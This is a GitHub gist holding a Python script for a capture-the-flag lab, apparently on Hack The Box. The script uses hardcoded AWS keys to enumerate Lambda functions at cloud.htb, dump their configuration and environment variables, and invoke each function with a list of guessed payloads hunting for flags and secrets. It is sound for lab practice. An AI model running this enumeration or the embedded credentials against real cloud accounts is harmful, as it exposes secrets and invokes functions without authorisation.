Created
September 11, 2025 09:38
-
-
Save RajChowdhury240/e8f5864dfa18bcf2347f4630c25996e2 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import boto3 | |
import json | |
from botocore.exceptions import ClientError, NoCredentialsError | |
import base64 | |
def enumerate_lambda_functions(): | |
AWS_ACCESS_KEY_ID = "ASIACVH82GQZDCNK2X9B" | |
AWS_SECRET_ACCESS_KEY = "cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn" | |
try: | |
lambda_client = boto3.client( | |
'lambda', | |
aws_access_key_id=AWS_ACCESS_KEY_ID, | |
aws_secret_access_key=AWS_SECRET_ACCESS_KEY, | |
endpoint_url='http://cloud.htb', | |
region_name='us-east-2' | |
) | |
print("π CTF Lambda Function Enumeration") | |
print("=" * 50) | |
print(f"Endpoint: http://cloud.htb") | |
print(f"Region: us-east-2") | |
print("=" * 50) | |
print("\n[+] Listing Lambda functions...") | |
try: | |
response = lambda_client.list_functions() | |
functions = response.get('Functions', []) | |
if not functions: | |
print("[-] No Lambda functions found") | |
return | |
print(f"[+] Found {len(functions)} function(s):") | |
function_names = [] | |
for i, func in enumerate(functions, 1): | |
name = func['FunctionName'] | |
function_names.append(name) | |
print(f" {i}. {name}") | |
print("\n" + "=" * 60) | |
print("DETAILED FUNCTION ANALYSIS") | |
print("=" * 60) | |
for func_name in function_names: | |
print(f"\n㪠Analyzing: {func_name}") | |
print("-" * 40) | |
try: | |
config_response = lambda_client.get_function(FunctionName=func_name) | |
config = config_response['Configuration'] | |
code_info = config_response.get('Code', {}) | |
print(f"Runtime: {config.get('Runtime', 'N/A')}") | |
print(f"Handler: {config.get('Handler', 'N/A')}") | |
print(f"Role: {config.get('Role', 'N/A')}") | |
print(f"Memory: {config.get('MemorySize', 0)} MB") | |
print(f"Timeout: {config.get('Timeout', 0)} seconds") | |
print(f"Last Modified: {config.get('LastModified', 'N/A')}") | |
print(f"Code Size: {config.get('CodeSize', 0)} bytes") | |
print(f"Description: {config.get('Description', 'No description')}") | |
env_vars = config.get('Environment', {}).get('Variables', {}) | |
if env_vars: | |
print("\nπ Environment Variables:") | |
for key, value in env_vars.items(): | |
print(f" {key} = {value}") | |
vpc_config = config.get('VpcConfig') | |
if vpc_config: | |
print(f"\nπ VPC Config:") | |
print(f" VPC ID: {vpc_config.get('VpcId', 'N/A')}") | |
if vpc_config.get('SubnetIds'): | |
print(f" Subnets: {', '.join(vpc_config.get('SubnetIds', []))}") | |
if vpc_config.get('SecurityGroupIds'): | |
print(f" Security Groups: {', '.join(vpc_config.get('SecurityGroupIds', []))}") | |
# Layers | |
layers = config.get('Layers', []) | |
if layers: | |
print(f"\nπ¦ Layers:") | |
for layer in layers: | |
print(f" {layer.get('Arn', 'N/A')}") | |
# Code location | |
if code_info: | |
print(f"\nπΎ Code Info:") | |
print(f" Repository Type: {code_info.get('RepositoryType', 'N/A')}") | |
if 'Location' in code_info: | |
print(f" Location: {code_info['Location']}") | |
# Try to get function code (if small enough) | |
try: | |
print(f"\nπ Attempting to retrieve function code...") | |
code_response = lambda_client.get_function(FunctionName=func_name) | |
if 'Code' in code_response and 'ZipFile' in code_response['Code']: | |
zip_content = code_response['Code']['ZipFile'] | |
print(f" Code retrieved: {len(zip_content)} bytes") | |
print(f" Base64 encoded ZIP file available") | |
# You could decode and extract this if needed | |
except Exception as e: | |
print(f" Could not retrieve code: {e}") | |
# Try multiple invocation strategies | |
print(f"\nπ Testing function invocation with various payloads...") | |
# Common CTF payloads to test | |
test_payloads = [ | |
{}, # Empty object | |
{"action": "get_flag"}, | |
{"cmd": "flag"}, | |
{"flag": True}, | |
{"key": "flag"}, | |
{"type": "flag"}, | |
{"event": "flag"}, | |
{"request": "flag"}, | |
{"data": "flag"}, | |
{"message": "flag"}, | |
{"command": "get_flag"}, | |
{"method": "GET"}, | |
{"path": "/flag"}, | |
{"body": ""}, | |
{"Records": []}, # Common AWS event structure | |
"flag", # Simple string | |
None, # Null | |
{"httpMethod": "GET", "path": "/"}, # API Gateway format | |
{"source": "test", "detail": {}}, # EventBridge format | |
] | |
successful_invocations = [] | |
for i, payload in enumerate(test_payloads): | |
try: | |
print(f" [{i+1}/{len(test_payloads)}] Testing payload: {json.dumps(payload)[:100]}...") | |
invoke_response = lambda_client.invoke( | |
FunctionName=func_name, | |
InvocationType='RequestResponse', | |
Payload=json.dumps(payload) if payload is not None else '' | |
) | |
status_code = invoke_response['StatusCode'] | |
if 'Payload' in invoke_response: | |
response_payload = invoke_response['Payload'].read() | |
try: | |
result = json.loads(response_payload.decode()) | |
response_str = json.dumps(result, indent=2) | |
except: | |
result = response_payload.decode() if response_payload else '' | |
response_str = result | |
# Check for potential flags or interesting responses | |
response_lower = str(result).lower() | |
if any(keyword in response_lower for keyword in ['flag', 'htb', 'ctf', 'secret', 'key']): | |
print(f" π― INTERESTING RESPONSE (Status {status_code}):") | |
print(f" Payload: {json.dumps(payload)}") | |
print(f" Response: {response_str}") | |
successful_invocations.append({ | |
'payload': payload, | |
'response': result, | |
'status': status_code | |
}) | |
elif status_code == 200 and result: | |
print(f" β Success (Status {status_code}): {str(result)[:200]}...") | |
successful_invocations.append({ | |
'payload': payload, | |
'response': result, | |
'status': status_code | |
}) | |
else: | |
print(f" β‘οΈ Status {status_code}: {str(result)[:100]}...") | |
except ClientError as e: | |
error_code = e.response['Error']['Code'] | |
print(f" β Error: {error_code}") | |
except Exception as e: | |
print(f" β Exception: {str(e)[:100]}...") | |
# Summary of successful invocations | |
if successful_invocations: | |
print(f"\nπ― SUMMARY - {len(successful_invocations)} successful invocation(s):") | |
for idx, inv in enumerate(successful_invocations, 1): | |
print(f" {idx}. Payload: {json.dumps(inv['payload'])}") | |
print(f" Response: {json.dumps(inv['response']) if isinstance(inv['response'], (dict, list)) else str(inv['response'])}") | |
print(f" Status: {inv['status']}") | |
print() | |
except ClientError as e: | |
error_code = e.response['Error']['Code'] | |
print(f" β Error getting function details: {error_code}") | |
except Exception as e: | |
print(f" β Unexpected error: {e}") | |
print("-" * 60) | |
except ClientError as e: | |
error_code = e.response['Error']['Code'] | |
print(f"β Error listing functions: {error_code}") | |
print(f"Error message: {e.response['Error']['Message']}") | |
except Exception as e: | |
print(f"β Connection/Auth error: {e}") | |
print("Check if the CTF environment is accessible") | |
def main(): | |
print("CTF AWS Lambda Enumeration Tool") | |
print("Target: http://cloud.htb") | |
enumerate_lambda_functions() | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment